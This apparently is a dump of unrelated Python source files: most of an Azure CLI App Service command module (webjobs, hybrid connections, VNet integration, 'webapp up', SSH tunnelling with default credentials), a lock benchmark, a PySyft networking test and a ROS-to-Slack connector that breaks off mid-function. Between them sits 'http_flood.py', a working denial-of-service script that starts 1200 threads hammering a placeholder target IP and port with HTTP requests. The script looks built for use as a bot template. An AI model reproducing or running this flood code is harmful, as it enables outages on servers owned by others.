client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
if n.name == namespace:
hy_co_id = n.id
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, hc, slot)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
# enures input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
# reformats the vnet entry, removing unecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnet_id = ''
for v in list_all_vnets:
if v.name == vnet:
vnet_id = v.id
# parsing the arm uri in order to extract vnet_name and vnet_resource_group
vnet_id_strings = vnet_id.split('/')
vnet_resource_group = ''
i = 0
for z in vnet_id_strings:
if z.lower() == "resourcegroups":
vnet_resource_group = vnet_id_strings[i + 1]
i = i + 1
if slot is None:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
else:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
name, slot)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
return logger.warning("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.create_or_update(vnet_resource_group, vnet, subnet,
subnet_parameters=subnetObj)
id_subnet = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
subnet_resource_id = id_subnet.id
swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
swift_supported=True)
if slot is None:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name,
swiftVnet)
else:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name,
swiftVnet, slot)
# reformats the vnet entry, removing unecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name, resource_group_name=None, plan=None, location=None, sku=None, dryrun=False, logs=False, # pylint: disable=too-many-statements,
launch_browser=False, html=False):
import os
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_create_new_app = does_app_already_exist(cmd, name)
os_name = detect_os_form_src(src_dir, html)
lang_details = get_lang_from_content(src_dir, html)
language = lang_details.get('language')
# detect the version
data = get_runtime_version_details(lang_details.get('file_loc'), language)
version_used_create = data.get('to_create')
detected_version = data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp %s already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app {}. Please check that the app is a part of "
"the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp {} exists in ResourceGroup {} and does not match the value entered {}. Please "
"re-run command with the correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered {} does not match the plan name that the webapp is hosted in {}."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(rg_name, plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp {} is a {} app. The code detected at '{}' will default to "
"'{}'. "
"Please create a new app to continue this operation.".format(name, current_os, src_dir, os))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("webapp %s doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name)
_is_linux = os_name.lower() == 'linux'
_create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux)
plan = get_plan_to_use(cmd, user, os_name, loc, sku, rg_name, _create_new_rg, plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, location)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
# we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
# updated we update those
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=location)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if _is_linux else None, tags={"cli": 'webapp_up'},
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for existing app if we might need to update the stack runtime settings
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
elif os_name.lower() == 'windows' and site_config.windows_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.windows_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, windows_fx_version=runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
# Remove the file after deployment, handling exception if user removed the file manually
try:
os.remove(zip_file_path)
except OSError:
pass
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _ping_scm_site(cmd, resource_group, name):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify())
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password)
_ping_scm_site(cmd, resource_group_name, name)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.isAlive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.isAlive() and t.isAlive():
time.sleep(5)
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None): # pylint: disable=too-many-statements
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise CLIError('remote debugging is enabled, please disable')
import platform
if platform.system() == "Windows":
raise CLIError('webapp ssh is only supported on linux and mac')
create_tunnel_and_session(cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout)
def create_devops_pipeline(
cmd,
functionapp_name=None,
organization_name=None,
project_name=None,
repository_name=None,
overwrite_yaml=None,
allow_force_push=None,
github_pat=None,
github_repository=None
):
from .azure_devops_build_interactive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name, repository_name,
overwrite_yaml, allow_force_push,
github_pat, github_repository)
return azure_devops_build_interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku in ['I1', 'I2', 'I3']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
|
http_flood.py
|
import socket, threading, time
__THREAD_NUMBER__ = 1200
def http_flood(ip: str, port: str, timeout: str):
def flood(ip: str, port: int, timeout: int):
start_time = int(time.time())
while int(time.time()) - start_time < timeout:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
for _ in range(50):
sock.send("GET / HTTP/1.1\r\n".encode())
except:
pass
for _ in range(__THREAD_NUMBER__):
threading.Thread(target= flood, args=(ip, int(port), int(timeout),)).start()
http_flood('!ip!', '!port!', '!time!')
|
lockbench.py
|
from threading import Thread
from threading import RLock
from fastrlock.rlock import FastRLock as FLock
def lock_unlock(l):
l.acquire()
l.release()
l.acquire()
l.release()
l.acquire()
l.release()
l.acquire()
l.release()
l.acquire()
l.release()
def reentrant_lock_unlock(l):
l.acquire()
l.acquire()
l.acquire()
l.acquire()
l.acquire()
l.release()
l.release()
l.release()
l.release()
l.release()
def mixed_lock_unlock(l):
l.acquire()
l.release()
l.acquire()
l.acquire()
l.release()
l.acquire()
l.release()
l.acquire()
l.release()
l.release()
def context_manager(l):
with l: pass
with l:
with l:
with l: pass
with l: pass
with l:
with l: pass
with l:
with l: pass
with l: pass
with l: pass
with l:
with l:
with l: pass
with l: pass
with l:
with l: pass
with l: pass
def lock_unlock_nonblocking(l):
if l.acquire(False):
l.release()
if l.acquire(False):
l.release()
if l.acquire(False):
l.release()
if l.acquire(False):
l.release()
if l.acquire(False):
l.release()
def threaded(l, test_func, tcount=10):
threads = [ Thread(target=test_func, args=(l,)) for _ in range(tcount) ]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
functions = [
lock_unlock,
reentrant_lock_unlock,
mixed_lock_unlock,
lock_unlock_nonblocking,
context_manager,
]
import sys
from timeit import Timer
from functools import partial
rlock, flock = ('RLock', RLock()), ('FLock', FLock())
locks = []
args = sys.argv[1:]
if not args:
locks = [rlock, flock]
else:
if 'rlock' in args:
locks.append(rlock)
if 'flock' in args:
locks.append(flock)
assert locks, args
for name, lock in locks:
print('Testing %s' % name)
repeat_count = 100000
print("sequential (x%d):" % repeat_count)
for function in functions:
timer = Timer(partial(function, lock))
print('%-25s: %.3f sec' % (function.__name__, max(timer.repeat(repeat=4, number=repeat_count))))
repeat_count = 1000
print("threaded 10T (x%d):" % repeat_count)
for function in functions:
timer = Timer(partial(threaded, lock, function))
print('%-25s: %.3f sec' % (function.__name__, max(timer.repeat(repeat=4, number=repeat_count))))
|
benchmark_send_get_multiprocess_test.py
|
# stdlib
import socket
import time
from typing import Any
from typing import List
# syft absolute
from syft.lib.python import List as SyList
from syft.lib.python.string import String
# syft relative
from ...syft.grid.duet.process_test import SyftTestProcess
PORT = 21211
def do_send(data: Any) -> None:
# syft absolute
import syft as sy
duet = sy.launch_duet(loopback=True, network_url=f"http://127.0.0.1:{PORT}/")
duet.requests.add_handler(action="accept")
_ = data.send(duet, searchable=True)
sy.core.common.event_loop.loop.run_forever()
def ds_get(data: Any) -> None:
# syft absolute
import syft as sy
duet = sy.join_duet(loopback=True, network_url=f"http://127.0.0.1:{PORT}/")
for retry in range(10):
if len(duet.store) != 0:
break
time.sleep(0.1)
assert len(duet.store) != 0
remote = duet.store[0].get(request_block=True, delete_obj=False)
assert remote == data
def run_endpoints(do_runner: Any, ds_runner: Any, data: Any) -> None:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
assert s.connect_ex(("localhost", PORT)) == 0
do_proc = SyftTestProcess(target=do_runner, args=(data,))
do_proc.start()
ds_proc = SyftTestProcess(target=ds_runner, args=(data,))
ds_proc.start()
ds_proc.join(120)
do_proc.terminate()
if do_proc.exception:
exception, tb = do_proc.exception
raise Exception(tb) from exception
if ds_proc.exception:
exception, tb = ds_proc.exception
raise Exception(tb) from exception
if ds_proc.is_alive():
ds_proc.terminate()
raise Exception(f"ds_proc is hanged for {len(data)}")
def send_get_string_multiprocess(data: String) -> None:
run_endpoints(do_send, ds_get, String(data))
def send_get_list_multiprocess(data: List[str]) -> None:
run_endpoints(do_send, ds_get, SyList(data))
|
ros_connector.py
|
import os
import signal
from base_connector import SlackConnector
import rospy
from std_msgs.msg import String
from rostopic import get_topic_class
from rosservice import get_service_class_by_name
from rosservice import get_service_list
from threading import Thread
from roslib.message import strify_message
import argparse
import roslib
import rosmsg
from collections import defaultdict
from datetime import datetime
from Queue import Queue, Empty
import cv2
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import tempfile
def __signal_handler(signum, frame):
print "stopped."
os._exit(signal.SIGTERM)
class RosConnector(SlackConnector):
ROS_PREFIX = '/slackeros'
LEVEL_SETS = {
'info': set([2, 4, 8, 16]),
'warn': set([4, 8, 16]),
'warning': set([4, 8, 16]),
'error': set([8, 16]),
'fatal': set([16]),
'off': set([])
}
REVERSE_LEVEL_SET = {
0: 'off',
1: 'debug',
2: 'info',
4: 'warn',
8: 'error',
16: 'fatal'
}
LEVEL_COLORS = {
0: '#000000',
1: '#CCCCCC',
2: '#888888',
4: '#FF8C00',
8: '#FF0000',
16: '#FF0000'
}
def __init__(
self,
incoming_webhook=None,
access_token=None,
upload_images=False,
whitelist_channels=[],
image_up_channels=[],
whitelist_users=[],
topics=[ROS_PREFIX + '/to_slack'],
prefix='',
sender_name='slackeros',
loggers={},
throttle_secs=5,
max_lines=50
):
self.incoming_webhook = incoming_webhook
self.access_token = access_token
self.upload_images = upload_images
self.whitelist_channels = set(whitelist_channels)
self.image_up_channels = set(image_up_channels)
self.whitelist_users = set(whitelist_users)
self.topics = set(topics)
self.max_lines = max_lines
self.messages = Queue(0)
self.last_published = defaultdict(rospy.Time)
self.throttle_secs = throttle_secs
self.image_upload_title = 'Image from the robot camera'
self.image_format = "jpeg"
self.bridge = CvBridge()
SlackConnector.__init__(
self, incoming_webhook,
whitelist_channels, whitelist_users, prefix, sender_name)
self.slash_pub = rospy.Publisher('~slash_cmd', String, queue_size=1)
self.subs = {}
for t in self.topics:
self._subscribe(t)
self.default_level = 'off'
self.attachment_buffer = defaultdict(list)
self.message_header = defaultdict(lambda: 'new data')
self.active_loggers = defaultdict(lambda: self.default_level)
if loggers:
self.logger_enabled = True
self.active_loggers.update(loggers)
self._subscribe('/rosout', self._log_received)
else:
self.logger_enabled = False
self.last_attachment = defaultdict(lambda: '')
self.queue_worker = Thread(target=self.process_queue)
self.queue_worker.setDaemon(True)
self.queue_worker.start()
def log_image(
self, type=None,
topic='/head_xtion/rgb/image_color',
channels=[]
):
class ImageUploader(Thread):
def __init__(
self, access_token, bridge, send_image, type=None,
image_format='jpeg', channels=[], image_upload_title="",
topic='/head_xtion/rgb/image_color'
):
Thread.__init__(self)
self.access_token = access_token
self.bridge = bridge
self.send_image = send_image
self.type = type
self.image_format = image_format
self.channels = channels
self.image_upload_title = image_upload_title
self.topic = topic
def run(self):
# upload image
try:
image = rospy.wait_for_message(
self.topic, Image, timeout=1.5)
except rospy.ROSException as e:
